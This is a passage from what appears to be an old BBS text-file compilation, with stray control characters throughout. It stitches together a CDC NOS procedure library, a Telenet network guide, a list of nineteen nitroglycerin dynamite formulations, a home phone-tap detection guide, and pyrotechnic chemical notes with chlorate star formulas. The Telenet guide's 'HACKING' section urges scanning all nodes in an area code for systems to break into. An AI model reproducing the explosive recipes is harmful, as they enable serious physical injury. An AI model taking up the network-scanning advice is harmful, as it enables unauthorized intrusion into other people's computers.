  1475. .******BBS******
  1476. $SACFIND,AID,MTAB.
  1477. $REVERT,NOLIST.
  1478. #EOR
  1479. .PROC,LI,FILE=.
  1480. .******LIST FILE******
  1481. $GET,FILE.
  1482. $ASCII.
  1483. $COPY(FILE)
  1484. $REVERT.
  1485. $EXIT.
  1486. $CSET(NORMAL)
  1487. $REVERT,NOLIST. WHERE IS THAT FILE??
  1488. #EOR
  1489. .PROC,LOCAL.
  1490. .******DIRECTORY OF LOCAL FILES******
  1491. $RETURN(PROCLIB,YYYYBAD,YYYYPRC)
  1492. $GET(QQQFILE=ENQF/UN=1GTL0CL)
  1493. QQQFILE.
  1494. $REVERT,NOLIST.
  1495. $EXIT.
  1496. $REVERT. FILES ERROR
  1497. #EOR
  1498. .PROC,RL.
  1499. .******RAISE LIMITS******
  1500. $SETASL(*)
  1501. $SETJSL(*)
  1502. $SETTL(*)
  1503. $CSET(ASCII)
  1504. $NOTE./ Limits now at max validated levels.
  1505. $CSET(NORMAL)
  1506. $REVERT,NOLIST.
  1507. #EOR
  1508. .PROC,CL.
  1509. .******CLEAR******
  1510. $CLEAR,*.
  1511. $CSET(ASCII)
  1512. $NOTE./LOCAL FILE AREA CLEARED
  1513. $REVERT,NOLIST.
  1514. #EOR
  1515. .PROC,P,FILE=THING,LST=LIST.
  1516. .***********************************************************
  1517. $CLEAR.
  1518. $GET(FILE)
  1519. $PASCAL4,FILE,LST.
  1520. $REVERT.
  1521. $EXIT.
  1522. $REWIND,*.
  1523. $CSET(ASCII)
  1524. $COPY(LIST)
  1525. $CSET(NORMAL)
  1526. $REVERT,NOLIST.
  1527. #EOR
  1528. .PROC,RE.
  1529. .******REWIND******
  1530. $REWIND,*.  ∩7Å3 
  1531. è$CSET(ASCII)
  1532. $NOTE./REWOUND.
  1533. $REVERT,NOLIST.
  1534. #EOR
  1535. .PROC,FOR,FILE,LST=LIST.
  1536. .********************************************************************
  1537. $CLEAR.
  1538. $GET(FILE)
  1539. $FTN5,I=FILE,L=LST.
  1540. $REPLACE(LST=L)
  1541. $CSET(ASCII)
  1542. $REVERT. Fortran Compiled
  1543. $EXIT.
  1544. $REWIND,*.
  1545. $COPY(LST)
  1546. $REVERT. That's all folks.
  1547. #EOR
  1548. .PROC,WAR.
  1549. .******WARBLES******
  1550. $SACFIND,AID,WAR.
  1551. $REVERT,NOLIST.
  1552. #EOR
  1553. .PROC,M.
  1554. .******MAIL/CHECK******
  1555. $MAIL/CHECK.
  1556. $REVERT,NOLIST.
  1557. #EOR
  1558. .PROC,MA.
  1559. .******ENTER MAIL******
  1560. $MAIL.
  1561. $REVERT,NOLIST.
  1562. #EOR
  1563. .PROC,HE,FILE=SUMPROC,UN=.
  1564. .******HELP FILE******
  1565. $GET,FILE/#UN=UN.
  1566. $COPY(FILE)
  1567. $REVERT.
  1568. $EXIT.
  1569. $REVERT,NOLIST.
  1570. #EOR
  1571. .PROC,DYNAMO.
  1572. .******WHO KNOWS??******
  1573. $GET,DYNMEXP/UN=7ETPDOC.
  1574. $SKIPR,DYNMEXP.
  1575. $COPYBR,DYNMEXP,GO.
  1576. $FIND,DYNAMO,GO.
  1577. $REVERT,NOLIST.
  1578. #EOR
  1579. #EOR
  1580. #EOI
  1581.  
  1582.  
  1583.  
  1584.                              The Basics of TELENET
  1585.                                      Part I
  1586.  
  1587.   This Bulletin is the first in a series to cover the general procedures of the
  1588. major data networks:
  1589.  
  1590. Telenet
  1591. Tymnet
  1592. Autonet
  1593. Arpanet
  1594. [More to be added]
  1595.  
  1596.  
  1597.                                    BACKGROUND  ∩7Å3 
  1598. è                                ----------
  1599.   Telenet connects many large computers to itself through dedicated telephone
  1600. lines, each of these 'host computers' is assigned a node address(ie.:NPAxx).
  1601. Telenet is an international data network, connecting to computers around the
  1602. world.See the International telenet bulletin for more on this.
  1603.  
  1604.                                    CONNECTING
  1605.                                    ----------
  1606.   Telenet is probably the most 'user friendly' network of the four listed.  A
  1607. normal logon looks like this:  [NPA=Area code,xx=node address] You hit <CR>
  1608. <CR> [2 Returns] Telenet respnds with:TELENET NPAxx
  1609.  
  1610. TERMINAL=(Here you type your terminal identifier) (See the bulletin section for
  1611.        the list)
  1612.  
  1613.              @
  1614.  
  1615.   The '@' is Telenet's promt to you to go ahead.
  1616.  
  1617.                             Things to do on telenet
  1618.                             -----------------------
  1619.   To connect to a node type:
  1620.                         @C NPAxx
  1621.   Telenet will atempt to connect to the computer at the node given.
  1622.   A few of the things that Telenet will say are:
  1623.  
  1624.  
  1625. NPAxx CONNECTED (You are connected to a computer)
  1626. ILLEGAL ADDRESS (Not a working node)
  1627. NPAxx NOT REACHABLE   (The computer at that node is 'DOWN')
  1628. NPAxx REFUSED  COLLECT CONNECTION(Needs a paid ID [More later]
  1629. NPAxx REJECTING (Computer is 'UP' but not available)
  1630. NPAxx NOT RESPONDING (The computer at that node is 'DOWN')
  1631.  
  1632.   These are most of the things that Telenet will tell you
  1633.  
  1634.                                MORE THINGS TO DO
  1635.                                -----------------
  1636.   Typing an @ while in a host computer will return you to Telenet You will
  1637. still be connected to the other computer, you may:  D (to disconnect from that
  1638. computer) or TAPE (Unknown, possibly records your actions so that) (you may
  1639. look at them later)
  1640.  
  1641.   If you type either of the above, while not connected to a node telenet will
  1642. respond with NOT CONNECTED
  1643.  
  1644.                                      MISC.
  1645.                                      -----
  1646. RESET (Returns Telenet to the beggining,you must start again (with the
  1647.       <CR><CR>)
  1648.  
  1649. SET (Unknown)
  1650.  
  1651. MAIL (To connect to GTE Telemail) It will ask for User?  and Password?
  1652.   ∩7Å3 
  1653. è
  1654.                                      NOTES
  1655.                                      -----
  1656.  
  1657.   In addition to the normal area codes in NPAxx there are also other NPA's used
  1658. in Telenet, 909 and 311, for instance.
  1659.  
  1660.   Telenet hangs up after three disconnections from host computers, this
  1661. unfortunately is quite a PAIN in the ___ There is no way to get around this as
  1662. far as I can tell.
  1663.  
  1664.   The ID command in Telenet is to Identify users to the host computers.  You
  1665. must type ID (your ID#) (your password).  If you just type ID, telenet will
  1666. tell you that your ID is cleared, which means nothing.  To recieve a paid user
  1667. ID on telenet call them at:  Telenet customer service:800-336-0437 800-572-
  1668. 0408(In Virginia)
  1669.  
  1670.  
  1671.                                     HACKING
  1672.                                     -------
  1673.   Telenet is very convinient for hackers as it connects many computers to your
  1674. terminal, without having to find and dial many numbers.  Start your Telehacking
  1675. by picking an areacode and then trying all the nodes in that NPA.  You will no
  1676. doubt find many interesting computers 'to work on'.
  1677.  
  1678.    Here are instructions for using TELENET.  There are some very basic things,
  1679. which most people already know, and some other things, which even the most
  1680. dedicated hackers have probably never even heard of.  This includes things such
  1681. as international access, etc.  Well, have fun.
  1682.  
  1683.  
  1684.                     THE TELENET CONNECTION
  1685.       INTERNATIONAL ADDRESSING/INTERNATIONAL ACCESS PROCEDURES
  1686.  
  1687.  
  1688. I.  TELENET INTERNATIONAL ADDRESS FORMAT
  1689.  
  1690.     ---------------------------- Data Network
  1691.     |                       Identification Code (DNIC)
  1692.     |
  1693.     |
  1694.     |
  1695.     |      ------------------- Area Code
  1696.     |      |
  1697.     |      |
  1698.     |      |    ------------- DTE Address
  1699.     |      |    |
  1700.     |      |    |      ----- Port Address
  1701.     |      |    |      |
  1702.     |      |    |      |
  1703.   DDDD    AAA  HHHHH   PP
  1704.                        |
  1705.                        ----- Optional Subaddress
  1706.                             Field for Packet Mode DTE
  1707.   ∩7Å3 
  1708. è
  1709. Example:  Telenet        International
  1710.         -------         -------------
  1711.         212 141         3110 21200141
  1712.         909  84         3110 90900084
  1713.  
  1714.  
  1715.  
  1716. II.   ACCESS TO OVERSEAS PUBLIC DATA NETWORKS
  1717.  
  1718. 1.  Turn on the terminal and coupler.
  1719. 2.  Dial the nearest Telenet access number (See Telenet Public Dial listing).
  1720.     When you hear a high-pitched tone, place the telephone
  1721.     receiver in the coupler.
  1722.  
  1723.      For Data Sets (Bell 103 or 113 type), depress the data button.
  1724.  
  1725. 3.  Type Two carriage returns (CR).
  1726. 4.  Telenet will give you a port identification number and ask you
  1727.     to identify your terminal type in the two or four
  1728.     character id for your terminal followed by a carriage
  1729.     return (CR) or type carriage return (CR).
  1730.  
  1731.       (EX.)   TELENET
  1732.              202 DL9
  1733.              TERMINAL = AJ63(CR)
  1734.  
  1735. 5.  After Telenet prompts with a '@' type 'ID', skip a space (SP)
  1736.     and type your password followed by a carriage return.  (Contact
  1737.     your GTE Telenet Representative to obtain a required caller
  1738.     paid ID.)
  1739.  
  1740.       (EX.)   @ID(SP);INTL(CR)
  1741.  
  1742.     Type in your password.
  1743.  
  1744.       (EX.)   PASSWORD = 123456(CR)
  1745.  
  1746. 6.  After Telenet prompts with an @, type a C. skip a space and
  1747.     type the network address of the computer you wish to access,
  1748.     followed by a carriage return (CR).
  1749.  
  1750.       (EX.)   @C(SP)023411234567890(CR)
  1751.  
  1752.     Note:  Your International address will follow a format such as:
  1753.  
  1754.          020801234567890 for France/Transpac
  1755.          023421234567890 for United Kingdom/British Telecom
  1756.          026241234567890 for Germany/Datex-P
  1757.  
  1758. 7.  Telenet will respond with a connection message.  You are now
  1759.     ready to begin your conversation with the host computer.
  1760.  
  1761.       (EX.)   (ADDRESS)CONNECTED
  1762.   ∩7Å3 
  1763. è8.  To disconnect from your computer, log off as usual.  Telene   will send you a disconnected message.
  1764.  
  1765.       (EX.)   (ADDRESS)DISCONNECTED
  1766.  
  1767.     Hang up to disconnect from Telenet.
  1768.  
  1769. (CR) = Carriage return
  1770. (SP) = Space
  1771.  
  1772.  
  1773.  
  1774.                                    Dynamite
  1775.  
  1776.      Dynamite is nothing more than just nitroglycerin and a stablizing agent
  1777. to make it much safer to use.  For the sake of saving time, I will abbreviate
  1778. nitroglycerin with a plain NG.  The numbers are percentages, be sure to mix
  1779. these carefully and be sure to use the exact amounts.  These percentages are
  1780. in weight ratio, not volume.
  1781.  
  1782. no.  ingredients                 amount
  1783. ---------------------------------------
  1784. #1   NG                          32
  1785.      sodium nitrate              28
  1786.      woodmeal                    10
  1787.      ammonium oxalate            29
  1788.      guncotten                    1
  1789.  
  1790. #2   NG                          24
  1791.      potassium nitrate            9
  1792.      sodium nitate               56
  1793.      woodmeal                     9
  1794.      ammonium oxalate             2
  1795.  
  1796. #3   NG                          35.5
  1797.      potassium nitrate           44.5
  1798.      woodmeal                     6
  1799.      guncotton                    2.5
  1800.      vaseline                     5.5
  1801.      powdered charcoal            6
  1802.  
  1803. #4   NG                          25
  1804.      potassium nitrate           26
  1805.      woodmeal                    34
  1806.      barium nitrate               5
  1807.      starch                      10
  1808.  
  1809. #5   NG                          57
  1810.      potassium nitrate           19
  1811.      woodmeal                     9
  1812.      ammonium oxalate            12
  1813.      guncotton                    3
  1814.  
  1815. #6   NG                          18
  1816.      sodium nitrate              70  ∩7Å3 
  1817. è     woodmeal                  5.5
  1818.      potassium chloride           4.5
  1819.      chalk                        2
  1820.  
  1821. #7   NG                          26
  1822.      woodmeal                    40
  1823.      barium nitrate              32
  1824.      sodium carbonate             2
  1825.  
  1826. #8   NG                          44
  1827.      woodmeal                    12
  1828.      anhydrous sodium sulfate    44
  1829.  
  1830. #9   NG                          24
  1831.      potassium nitrate           32.5
  1832.      woodmeal                    33.5
  1833.      ammonium oxalate            10
  1834.  
  1835. #10  NG                          26
  1836.      potassium nitrate           33
  1837.      woodmeal                    41
  1838.  
  1839. #11  NG                          15
  1840.      sodium nitrate              62.9
  1841.      woodmeal                    21.2
  1842.      sodium carbonate              .9
  1843.  
  1844. #12  NG                          35
  1845.      sodium nitrate              27
  1846.      woodmeal                    10
  1847.      ammonium oxalate             1
  1848.  
  1849. #13  NG                          32
  1850.      potassium nitrate           27
  1851.      woodmeal                    10
  1852.      ammonium oxalate            30
  1853.      guncotton                    1
  1854.  
  1855. #14  NG                          33
  1856.      woodmeal                    10.3
  1857.      ammonium oxalate            29
  1858.      guncotton                     .7
  1859.      potassium perchloride       27
  1860.  
  1861. #15  NG                          40
  1862.      sodium nitrate              45
  1863.      woodmeal                    15
  1864.  
  1865. #16  NG                          47
  1866.      starch                      50
  1867.      guncotton                    3
  1868.  
  1869. #17  NG                          30
  1870.      sodium nitrate              22.3
  1871.      woodmeal                    40.5  ∩7Å3 
  1872. è     potassium chloride        7.2
  1873.  
  1874. #18  NG                          50
  1875.      sodium nitrate              32.6
  1876.      woodmeal                    17
  1877.      ammonium oxalate              .4
  1878.  
  1879. #19  NG                          23
  1880.      potassium nitrate           27.5
  1881.      woodmeal                    37
  1882.      ammonium oxalate             8
  1883.      barium nitrate               4
  1884.      calcium carbonate             .5
  1885.  
  1886.  
  1887.  
  1888.  
  1889.                          BUG DETECTION ON HOME PHONES
  1890.  
  1891.   FIRST OF ALL TO TEST FOR BUGS, YOU NEED A VOM (MULTIMETER) THE HIGHER THE
  1892. IMPEDANCE THE BETTER (A DIGITAL WITH FET CIRCUITRY OR A VACUUM TUBE VOLT METER
  1893. IS THE BEST).
  1894.  
  1895.   FIRST DISCONNECT THE PHONE LINE(S) AT BOTH ENDS.  UNDO THE PHONE INSTRUMENT
  1896. AND HOOK IT UP TO THE ENTRY POINT OF THE PHONE LINE FROM THE OUTSIDE WORLD (MA
  1897. BELL DOES NOT LIKE YOU CUT HER OFF COMPLETELY.)  THE SCHEME IS THE PHYSICALLY
  1898. ISOLATE YOUR HOUSE, APARTMENT, ETC. FROM THE OUTSIDE WORLD.  BUT BEFORE YOU DO
  1899. THIS MEASURE THE LINE VOLTAGE (IT SHOULD BE APPROXIMATELY 48 VOLTS).
  1900.  
  1901.   NOW WITH THE WIRES DISCONNECTED AT BOTH ENDS, SET YOUR RESISTANCE SCALE TO A
  1902. HIGH READING AND MEASURE THE RESISTANCE OF THE PHONE LINE, IT SHOULD BE VERY
  1903. HIGH ON THE ORDER OF MILLION OHMS OR MORE, THIS IS THE NORMAL CONDITION, SINCE
  1904. YOU ARE MEASURING THE RESISTANCE OF AN OPEN CIRCUIT.  IF IT IS MUCH LESS, SAY
  1905. 50-100KOHMS THEN YOU A DEVICE ON THE LINE THAT DOES NOT BELONG THERE, PROBABLY
  1906. A PARALLEL BUG.
  1907.  
  1908.   NOW TWIST THE END OF THE DISCONNECTED WIRE AND GO TO THE OTHER END AND
  1909. MEASURE THE RESISTANCE OF THIS.  THIS RESISTANCE SHOULD BE ABOUT ONE OHM OR
  1910. TWO AT THE MOST IN A BIG HOUSE WITH A LOT OF PHONES.  IF IT IS MORE, THEN YOU
  1911. PROBABLY HAVE A SERIES BUG.
  1912.  
  1913.   IF IN THE FIRST CASE, TAKING PARALLEL MEASUREMENTS USING A METER (NOT
  1914. LEDLLCD) AND YOU NOTICE A "KICK" IN THE NEEDLE, YOU PROBABLY HAVE A LINE TAP.
  1915.  
  1916.   NOW IF YOU ALSO MAKE A MEASUREMENT WITH THE WIRE END TWISTED TOGETHER AND
  1917. YOU NOTICE THE RESISTANCE READS ABOUT 1-2KOHMS, THEN YOU MAY HAVE A DROP-OUT
  1918. RELAY. A DROP-OUT RELAY IS A RELAY THAT SENSES A PHONE GOING OFF HOOK, AND
  1919. SIGNALS A TAPE RECORDER TO START RECORDING.
  1920.  
  1921.   ANOTHER TEST TO DO WITH THE PHONES STILL HOOKED UP TO THE OUTSIDE WORLD, ON
  1922. HOOK VOLTAGE IS ABOUT 48 VOLTS AND OFF HOOK IS ABOUT 6-10 VOLTS.  ANY OTHER
  1923. CONDITIONS MAY MEAN TELEPHONE SURVEILLANCE.
  1924.  
  1925.   IF YOU USE A WIDE RANGE AUDIO FREQUENCY GENERATOR AND CALL YOUR HOUSE,
  1926. APARTMENT, ETC. FROM ANOTHER PHONE AND SWEEP UP AND DOWN THE SPECTRUM, AND YOU  ∩7Å3 
  1927. èNOTICE THE PHONE ANSWERS ITSELF SOMEWHERE IN THE SWEEP YOU PROBABLY HAVE AN
  1928. INFINITY TRANSMITTER ON YOUR LINE.
  1929.  
  1930.  
  1931.  
  1932.  
  1933.                        Stars, Flares, and Color Mixtures
  1934.  
  1935.   We will be using the following materials this time. Get familiar with them.
  1936. Some can be highly dangerous.
  1937.  
  1938.  
  1939. Aluminum Dust (and powder)   Al
  1940.  
  1941. An element used for brilliancy in the fine powder form. It can be purchased as
  1942. a fine silvery or gray powder. All grades from technical to superpure (99.9%)
  1943. can be used. It is dangerous to inhale the dust. The dust is also flammable, by
  1944. itself. In coarser forms, like powder, it is less dangerous.
  1945.  
  1946. Antimony Sulfide Sb S
  1947.                    2 3
  1948. Also known as "Black" Antimony Sulfide. (There is also a "Red" form, which is
  1949. useless to us.) This is used to sharpen the report of firecrackers, salutes,
  1950. etc, or to add color to a fire. The technical, black, powder is suitable. Avoid
  1951. contact with the skin. Dermatitis or worse will be the result.
  1952.  
  1953. Barium Chlorate   Ba(ClO ) * H O
  1954.                         3 2   2
  1955. Available as a white powder. It is poisonous, as are all Barium salts. It is
  1956. used both as an oxidizer and color imparter. It is as powerful as Potassium
  1957. Chlorate and should be handled with the same care. Melting point is 414
  1958. degrees.
  1959.  
  1960. Barium Nitrate  Ba(NO )
  1961.                      3 2
  1962. Poisonous. Used as an oxidizer and colorizer. The uses and precautions are the
  1963. same as with a mixture containing Potassium Nitrate.
  1964.  
  1965. Charcoal  C
  1966.  
  1967. A form of the element carbon. Used in fireworks and explosives as a reducing
  1968. agent. It can be purchased as a dust on up to a coarse powder. Use dust form,
  1969. unless otherwise specified. The softwood variety is best, and it should be
  1970. black, not brown.
  1971.  
  1972. Copper Acetoarsenite   (CuO) As O Cu(C H O )
  1973.                             3  2 3    2 3 2 2
  1974. The popular name for this is Paris Green. It is also called King's Green or
  1975. Vienna Green. It has been used as an insecticide, and is available as a
  1976. technical grade, poisonous, emerald green powder. It is used in fireworks to
  1977. add color. Careful with this stuff. It contains arsenic.
  1978.  
  1979. Copper Chloride   CuCl
  1980.                       2
  1981. A color imparter. As with all copper salts, this is poisonous.  ∩7Å3 
  1982. è
  1983. Copper Sulfate   CuSO *5H O
  1984.                      4   2
  1985. Known as Blue Vitriol, this poisonous compound is available as blue crystals or
  1986. blue powder. Can be purchased in some drugstores and some agricultural supply
  1987. stores. Used as a colorizer.
  1988.  
  1989. Dextrine
  1990. This can be purchased as a white or yellow powder. It is a good cheap glue for
  1991. binding cases and stars in fireworks.
  1992.  
  1993. Lampblack   C
  1994.  
  1995. This is another form of the element carbon. It is a very finely powdered black
  1996. dust (soot, actually) resulting from the burning of crude oils. It is used for
  1997. special effects in fireworks.
  1998.  
  1999. Lead Chloride  PbCl
  2000.                    3
  2001. Available as a white, crystalline, poisonous powder, which melts at 501
  2002. degrees. As with all lead salts, it is not only poisonous, but the poison
  2003. accumulates in the body, so a lot of small, otherwise harmless doses can be as
  2004. bad as one large dose.
  2005.  
  2006. Mercurous Chloride  HgCl
  2007.  
  2008. Also known as calomel or Mercury Monochloride. This powder will brighten an
  2009. otherwise dull colored mixture. Sometimes it is replaced by Hexachlorobenzene
  2010. for the same purpose. This is non poisonous ONLY if it is 100% pure. Never
  2011. confuse this chemical with Mercuric Chloride, which is poisonous in any purity.
  2012.  
  2013. Potassium Chlorate  KClO
  2014.                         3
  2015. This, perhaps, is the most widely used chemical in fireworks. Before it was
  2016. known, mixtures were never spectacular in performance. It opened the door to
  2017. what fireworks are today. It is a poisonous, white powder that is used as an
  2018. oxidizer. Never ram or strike a mixture containing Potassium Chlorate. Do not
  2019. store mixtures containing this chemical for any length of time, as they may
  2020. explode spontaneously.
  2021.  
  2022. Potassium Dichromate   K Cr O
  2023.                         2  2 7
  2024. Also known as Potassium Bichromate. The commercial grade is used in fireworks
  2025. and matches. The bright orange crystals are poisonous.
  2026.  
  2027. Potassium Nitrate   KNO
  2028.                        3
  2029. Commonly called Saltpeter. This chemical is an oxidizer which decomposes at 400
  2030. degrees. It is well known as a component of gunpowder and is also used in other
  2031. firework pieces. Available as a white powder.
  2032.  
  2033. Potassium Perchlorate   KClO
  2034.                             4
  2035. Much more stable than its chlorate brother, this chemical is a white or
  2036. slightly pink powder. It can often substitute for Potassium Chlorate to make  ∩7Å3 
  2037. èthe mixture safer. It will not yield its oxygen as easily, but to make up for
  2038. this, it gives off more oxygen. It is also poisonous.
  2039.  
  2040. Red Gum
  2041.  
  2042. Rosin similar to shellac and can often replace it in many fireworks formulas.
  2043. Red Gum is obtained from barks of trees.
  2044.  
  2045. Shellac Powder
  2046.  
  2047. An organic rosin made from the secretions of insects which live in India. The
  2048. exact effect it produces in fireworks is not obtainable from other gums. The
  2049. common mixture of shellac and alcohol sold in hardware stores should be
  2050. avoided. Purchase the powdered variety, which is orange in color.
  2051.  
  2052. Sodium Oxalate  Na C O
  2053.                   2 2 4
  2054. Used in making yellow fires. Available as a fine dust, which you should avoid
  2055. breathing.
  2056.  
  2057. Strontium Carbonate   SrCO
  2058.                           3
  2059. Known in the natural state as Strontianite, this chemical is used for adding a
  2060. red color to fires. It comes as a white powder, in a pure, technical, or
  2061. natural state.
  2062.  
  2063. Strontium Nitrate   Sr(NO )
  2064.                          3 2
  2065. By far the most common chemical used to produce red in flares, stars and fires.
  2066. Available in the technical grade as a white powder. It does double duty as an
  2067. oxidizer, but has a disadvantage in that it will absorb some water from the
  2068. air.
  2069.  
  2070. Strontium Sulfate   SrSO
  2071.                         4
  2072. Since this chemical does not absorb water as readily as the nitrate, it is
  2073. often used when the powder is to be stored. In its natural state it is known as
  2074. Celestine, which is comparable to the technical grade used in fireworks.
  2075.  
  2076. Sulfur   S
  2077.  
  2078. A yellow element that acts as a reducing agent. It burns at 250 degrees, giving
  2079. off choking fumes. Purchase the yellow, finely powdered form only. Other forms
  2080. are useless without a lot of extra and otherwise unnecessary effort to powder
  2081. it.
  2082.  
  2083. Zinc Dust   Zn
  2084.  
  2085. Of all the forms of zinc available, only the dust form is in any way suitable.
  2086. As a dust, it has the fineness of flour. Should be either of the technical or
  2087. high purity grade. Avoid breathing the dust, which can cause lung damage. Used
  2088. in certain star mixtures, and with sulfur, as a rocket fuel.
  2089.  
  2090.  
  2091.   ∩7Å3 
  2092. è                         The Chemistry of Pyrotechnics
  2093.  
  2094. Most pyrotechnic mixtures follow a very simple set of chemical rules. We'll go
  2095. over those now. Most mixtures contain an oxidizing agent, which usually
  2096. produces oxygen used to burn the mixture, and a reducing agent, which burns to
  2097. produce hot gasses. In addition, there can be coloring agents to impart a color
  2098. to the fire, binders, which hold the mixture in a solid lump, and regulators
  2099. that speed up or slow down the speed at which the mixture burns. These are not
  2100. all the possibilities, but they cover most all cases.
  2101.  
  2102. Oxidizing agents, such as nitrates, chlorates, and perchlorates provide the
  2103. oxygen. They usually consist of a metal ion and the actual oxidizing radical.
  2104. For example, Potassium Nitrate contains a metal ion (Potassium) and the
  2105. oxidizing radical (the Nitrate). Instead of potassium, we could instead
  2106. substitute other metals, like sodium, barium, or strontium, and the chemical
  2107. would still supply oxygen to the burning mixture. But some are less desirable.
  2108. Sodium Nitrate, for example, will absorb moisture out of the air, and this will
  2109. make it harder to control the speed at which the mixture will burn.
  2110.  
  2111. In the following examples, we'll use the letter "X" to show the presence of a
  2112. generic metal ion.
  2113.  
  2114. Note that Nitrates are stingy with the oxygen that they give up. They only give
  2115. one third of what they have.
  2116.  
  2117.     Some        Some
  2118.    Nitrate     Nitrite  Oxygen
  2119.  
  2120.      2XNO  ---> 2XN0    +  O
  2121.          3          2       2
  2122.  
  2123. Chlorates are very generous, on the other hand. They give up all the oxygen
  2124. they have. Furthermore, they give it up more easily. It takes less heat, or
  2125. less shock to get that oxygen loose. Mixtures using chlorates burn more
  2126. spectacularly, because a smaller volume of the mix needs to be wasted on the
  2127. oxidizer, and the ease with which the oxygen is supplied makes it burn faster.
  2128. But the mixture is also MUCH more sensitive to shock.
  2129.  
  2130.      Some           Some
  2131.    Chlorate       Chloride     Oxygen
  2132.  
  2133.      2XClO   --->   2XCl     +   3O
  2134.           3                        2
  2135.  
  2136. Perchlorates round out our usual set of oxidizing tools. Perchlorates contain
  2137. even more oxygen than Chlorates, and also give it all up. However, they are not
  2138. as sensitive as the Chlorates, so they make mixtures that are "safer". That is,
  2139. they're less likely to explode if you drop or strike them.
  2140.  
  2141.      Some          Some
  2142.   Perchlorate    Chloride     Oxygen
  2143.  
  2144.      XClO   --->   XCl     +    2O
  2145.          4                        2
  2146.   ∩7Å3 
  2147. è
  2148. Reducing agents, like sulfur and charcoal (carbon) simply burn the oxygen to
  2149. produce sulfur dioxide and carbon dioxide. It's usually best to include a
  2150. mixture of the two in a pyrotechnic mixture, as they burn at different speeds
  2151. and temperatures, and the proper combination will help control the speed of
  2152. combustion. Also, when extra fast burning speed is needed, like in rockets and
  2153. firecrackers, metal powder is often added. The finer the powder, the faster the
  2154. burning rate. The proportions change the speed, as well. Magnesium powder or
  2155. dust is often used for speed. Aluminum dust works, but not as well. Zinc dust
  2156. is used in some cases. Powdered metal, (not dust) particularly aluminum or
  2157. iron, are often used to produce a mixtire that shoots out sparks as it burns.
  2158. In rare cases, it is desirable to slow down the burning speed. In this case,
  2159. corn meal is often used. It burns, so acts as a reducing agent, but it doesn't
  2160. burn very well.
  2161.  
  2162.  
  2163. Coloring agents are very interesting. It's long been known that various metals
  2164. produce different colored flames when burned in a fire. The reasons are buried
  2165. in the realm of quantum physics, but the results are what matters, and we can
  2166. present them here. Note that if we use an oxidizing agent that contains a
  2167. colorizing metal, it can do a double job. It can produce oxygen and color.
  2168.  
  2169. Barium     -Barium salts give a pleasant green color. Barium Nitrate is most
  2170.             often used.
  2171. Strontium  -Strontium salts give a strong red color. Strontium Nitrate is a
  2172.             very convenient material for red.
  2173. Sodium     -Sodium salts give an intense yellow color. So intense in fact that
  2174.             any sodium compounds in a mixture will usually wash out other
  2175.             colorizers. As has been said, Sodium Nitrate absorbs moisture from
  2176.             the air, and so is not really suitable to impart color. Instead,
  2177.             Sodium Oxalate is usually used. This does not absorb lots of water,
  2178.             but has the disadvantage of being very poisonous.
  2179. Copper     -Copper salts are used to give a blue color. Blue is the most
  2180.             difficult color to produce, and it's usually not too spectacular.
  2181.             Usually Copper Acetoarsenite (Paris Green) is used. This compound
  2182.             contains arsenic, and is very poisonous. Since it still doesn't
  2183.             produce a very memorable blue, it's often used with mercurous
  2184.             chloride, which enhances the color, but is also poisonous, and
  2185.             expensive, to boot.
  2186. Potassium  -Potassium salts will give a delicate purple color, if they'e very
  2187.             pure. The cheaper lab grades of potassium nitrate often contain
  2188.             traces of sodium, which completely obscure the purple color. In
  2189.             order to get the purple coloring, very pure grades must be used,
  2190.             and you must be very careful to mix it in very clean vessels, and
  2191.             scoop it from the supply jar with a very clean scoop. The color is
  2192.             certainly worth the effort, if you can get it.
  2193.  
  2194.  
  2195. Some mixtures that burn in colors also contain binders, that hold the mixture
  2196. together in a solid lump. These lumps are usually referred to as stars. The
  2197. balls fired from a roman candle or the colorful showers sprayed from aerial
  2198. bombs are examples of stars. Depending on the mixture, the binder is either a
  2199. starch called dextrine or finely powdered orange shellac. A shellac-like
  2200. material called red gum is also used on occasion. In some mixtures, the shellac
  2201. powder also helps produce a nice color. Shellac mixtures are moistened with  ∩7Å3 
  2202. èalcohol to get them to stick together. Dextrine mixtures are moistened with
  2203. water.
  2204.  
  2205. If the colored mixture is to be used as a flare, it's just packed into a thin
  2206. paper tube. If it's to be fired from a roman candle, it's usually extruded from
  2207. a heavy tube by pushing it out with a dowel, and the pieces are cut off as the
  2208. proper length pops out. Stars fired from an aerial bomb are usually made by
  2209. rolling the moist mixture flat, and cutting it with a knife into small cubes.
  2210. Stars that are extruded are often called "pumped stars" those that are rolled
  2211. out are "cut stars".
  2212.  
  2213. The following are formulas for mixtures that burn with various colors. Parts
  2214. are by weight.
  2215.  
  2216. Red
  2217.  
  2218. Potassium Chlorate    9
  2219. Lampblack             1
  2220. Strontium Nitrate     9
  2221. bind with shellac
  2222. dissolved in alcohol
  2223.  
  2224.  
  2225. Blue
  2226.  
  2227. Potassium Chlorate    9         This one is inferior
  2228. Copper Acetoarsenite  2         Potassium Chlorate    12
  2229. Mercurous Chloride    1         Copper Sulfate        6
  2230. Sulfur                2         Lead Chloride         1
  2231. bind with dextrine              Sulfur                4
  2232. in water                        bind with dextrin in water
  2233.  
  2234.  
  2235. Green
  2236.  
  2237. Barium Chlorate       8         Barium Nitrate        3
  2238. Lampblack             1         Potassium Chlorate    4
  2239. Shellac Powder        1         Shellac Powder        1
  2240. bind with alcohol               Dextrine              1/4
  2241.                                 Bind with alcohol
  2242.  
  2243. Yellow
  2244.  
  2245. Potassium Chlorate    8         Potassium Chlorate    8
  2246. Sodium Oxalate        3         Sodium Oxalate        4
  2247. Lampblack             2         Shellac Powder        2
  2248. Bind with shellac in            Dextrine              1
  2249. alcohol or dextrine             Bind with alcohol
  2250. in water
  2251.  
  2252.  
  2253. White
  2254.  
  2255. Potassium Nitrate     6
  2256. Sulfur                1  ∩7Å3 
  2257. èAntimony Sulfide      2
  2258. bind with dextrine in
  2259. water
  2260.  
  2261.  
  2262. Orange
  2263.  
  2264. Strontium Nitrate     36
  2265. Sodium Oxalate        8
  2266. Potassium Chlorate    5
  2267. Shellac Powder        5
  2268. Sulfur                3
  2269. Bind with alcohol
  2270.  
  2271.  
  2272. Purple (ingredients must be very pure)
  2273.  
  2274. Potassium Chlorate    36        This one has more of a lilac color
  2275. Strontium Sulfate     10        Potassium Chlorate    38
  2276. Copper Sulfate        5         Strontium Carbonate   18
  2277. Lead Chloride         2         Copper Chloride       4
  2278. Charcoal              2         Lead Chloride         2
  2279. Sulfur                12        Sulfur                14
  2280. bind with dextrine in           bind with dextrine in water
  2281. water
  2282.  
  2283.  
  2284. Brilliant White
  2285.  
  2286. Potassium Perchlorate 12
  2287. Aluminum Dust         4
  2288. Dextrine              1
  2289. Bind with water
